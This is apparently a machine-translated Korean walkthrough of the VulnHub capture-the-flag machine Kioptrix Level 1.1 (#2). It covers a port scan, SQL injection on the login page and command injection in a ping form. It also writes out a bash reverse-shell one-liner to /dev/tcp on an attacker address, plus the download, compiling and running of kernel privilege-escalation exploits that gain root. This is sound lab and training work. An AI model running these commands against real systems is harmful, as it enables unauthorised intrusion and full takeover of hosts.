vulnhub Walkthrough:Kioptrix: Level 1.1 (#2)

6595 단어 보안VulnHubCTF
초보자가 가득한 시큐리티 엔지니어를 목표로 하기 위해 공부한 비망록이 되기 때문에 잘못되어 있는 일이 있을지도 모릅니다.
vulnhub의 의도적으로 취약성이 만들어진 Kioptrix: Level 1.1 (#2)의 Walkthrough입니다.

vulnhub 정보





이름
Kioptrix: Level 1.1 (#2)


Date release
11 Feb 2011

작성자
Kioptrix

시리즈
Kioptrix

웹 페이지
h tp // w w. 버섯 ptx. 이 m/bぉg/? 파게_이 d=135


PortScan:



root@kali:~# nmap -sS -sV 192.168.56.70
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 22:41 JST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.70
Host is up (0.00020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
720/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 08:00:27:6A:AC:A2 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds

Exploitation:



로그인 화면에 sql 주입이있었습니다.



로그인 후의 화면은 ping 커멘드를 실행하는 폼이 되고 있습니다.
OS 명령 주입이 있는지 확인한 결과 취약점이 존재하는 것 같습니다.




리버스 쉘을 실행합니다.

bash -i >& /dev/tcp/192.168.56.65/1234 0>&1
netcat 에서 연결을 기다립니다.
연결할 수 있었습니다.

root@kali:~# netcat -lvp 1234
listening on [any] 1234 ...
192.168.56.70: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.65] from (UNKNOWN) [192.168.56.70] 33954
bash: no job control in this shell
bash-3.00$ 

Privilege Escalation:


LinEnum.sh 를 서버에 업로합니다. LinEnum 결과 Linux 버전에 취약한 것 같습니다.

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

root@kali:~# searchsploit kernel 2.6 linux local | grep "CentOS\ 4"
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Priv | exploits/linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escal | exploits/linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escala | exploits/linux_x86/local/9542.c
9542.c 를 업로드하고 실행했지만 권한 승격에 참여하지 않았습니다.

bash-3.00$ ls
9542.c
a.out
LinEnum.sh
bash-3.00$ ./a.out
[-] exploit failed, try again
bash-3.00$ 

이제 9545.c를 업로드하고 실행합니다.
권한 승격할 수 있었습니다.

root@kali:~# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 …
bash-3.00$ wget http://192.168.56.65:8000/9545.c
--00:24:01--  http://192.168.56.65:8000/9545.c
           => `9545.c'
Connecting to 192.168.56.65:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,783 (9.6K) [text/plain]

    0K .........                                             100%   59.05 MB/s

00:24:01 (59.05 MB/s) - `9545.c' saved [9783/9783]

bash-3.00$ ls
9542.c
9545.c
a.out
LinEnum.sh
bash-3.00$ gcc 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# 

면책사항



본 기사는 정보 보안에 있어서의 공격의 이해, 방위의 스킬 향상을 목적으로 한 보안에 관한 내용이 있습니다. 본 기사의 내용을 사용하여 발생한 어떠한 손해나 손실에 대해서, 본 기사 작성자는 일절의 책임을 지지 않습니다.
본 기사의 내용을 실제로 사용하여 제3자의 개인이나 조직 등을 공격한 경우는 법률에 의해 처벌될 가능성이 있으므로 반드시 자신이 소유하고 있는 환경만을 대상으로 하여 타인이나 조직 가 소유하고 있는 환경은 결코 대상으로 하지 않도록 부탁합니다.

좋은 웹페이지 즐겨찾기